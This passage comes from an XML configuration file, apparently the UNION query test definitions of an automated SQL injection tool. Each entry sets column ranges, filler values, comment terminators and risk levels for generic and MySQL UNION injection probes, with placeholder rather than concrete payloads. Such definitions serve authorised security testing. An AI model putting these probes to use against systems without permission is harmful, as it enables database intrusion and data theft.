<response>
<union/>
</response>
</test>
<test>
<title>Generic UNION query ([CHAR]) - 21 to 30 columns</title>
<stype>6</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char>
<columns>21-30</columns>
</request>
<response>
<union/>
</response>
</test>
<test>
<title>Generic UNION query (NULL) - 21 to 30 columns</title>
<stype>6</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char>
<columns>21-30</columns>
</request>
<response>
<union/>
</response>
</test>
<test>
<title>Generic UNION query ([RANDNUM]) - 21 to 30 columns</title>
<stype>6</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[RANDNUM]</char>
<columns>21-30</columns>
</request>
<response>
<union/>
</response>
</test>
<test>
<title>Generic UNION query ([CHAR]) - 31 to 40 columns</title>
<stype>6</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char>
<columns>31-40</columns>
</request>
<response>
<union/>
</response>
</test>
<test>
<title>Generic UNION query (NULL) - 31 to 40 columns</title>
<stype>6</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char>
<columns>31-40</columns>
</request>
<response>
<union/>
</response>
</test>
<test>
<title>Generic UNION query ([RANDNUM]) - 31 to 40 columns</title>
<stype>6</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[RANDNUM]</char>
<columns>31-40</columns>
</request>
<response>
<union/>
</response>
</test>
<test>
<title>Generic UNION query ([CHAR]) - 41 to 50 columns</title>
<stype>6</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char>
<columns>41-50</columns>
</request>
<response>
<union/>
</response>
</test>
<test>
<title>Generic UNION query (NULL) - 41 to 50 columns</title>
<stype>6</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char>
<columns>41-50</columns>
</request>
<response>
<union/>
</response>
</test>
<test>
<title>Generic UNION query ([RANDNUM]) - 41 to 50 columns</title>
<stype>6</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[RANDNUM]</char>
<columns>41-50</columns>
</request>
<response>
<union/>
</response>
</test>
<test>
<title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype>6</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
<char>[CHAR]</char>
<columns>[COLSTART]-[COLSTOP]</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype>6</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
<char>NULL</char>
<columns>[COLSTART]-[COLSTOP]</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype>6</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
<char>[RANDNUM]</char>
<columns>[COLSTART]-[COLSTOP]</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL UNION query ([CHAR]) - 1 to 10 columns</title>
<stype>6</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
<char>[CHAR]</char>
<columns>1-10</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL UNION query (NULL) - 1 to 10 columns</title>
<stype>6</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
<char>NULL</char>
<columns>1-10</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL UNION query ([RANDNUM]) - 1 to 10 columns</title>
<stype>6</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
<char>[RANDNUM]</char>
<columns>1-10</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL UNION query ([CHAR]) - 11 to 20 columns</title>
<stype>6</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
<char>[CHAR]</char>
<columns>11-20</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL UNION query (NULL) - 11 to 20 columns</title>
<stype>6</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
<char>NULL</char>
<columns>11-20</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL UNION query ([RANDNUM]) - 11 to 20 columns</title>
<stype>6</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
<char>[RANDNUM]</char>
<columns>11-20</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL UNION query ([CHAR]) - 21 to 30 columns</title>
<stype>6</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
<char>[CHAR]</char>
<columns>21-30</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL UNION query (NULL) - 21 to 30 columns</title>
<stype>6</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
<char>NULL</char>
<columns>21-30</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL UNION query ([RANDNUM]) - 21 to 30 columns</title>
<stype>6</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
<char>[RANDNUM]</char>
<columns>21-30</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL UNION query ([CHAR]) - 31 to 40 columns</title>
<stype>6</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
<char>[CHAR]</char>
<columns>31-40</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL UNION query (NULL) - 31 to 40 columns</title>
<stype>6</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
<char>NULL</char>
<columns>31-40</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL UNION query ([RANDNUM]) - 31 to 40 columns</title>
<stype>6</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
<char>[RANDNUM]</char>
<columns>31-40</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL UNION query ([CHAR]) - 41 to 50 columns</title>
<stype>6</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
<char>[CHAR]</char>
<columns>41-50</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL UNION query (NULL) - 41 to 50 columns</title>
<stype>6</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
<char>NULL</char>
<columns>41-50</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL UNION query ([RANDNUM]) - 41 to 50 columns</title>
<stype>6</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
<char>[RANDNUM]</char>
<columns>41-50</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<!-- End of UNION query tests -->
</root>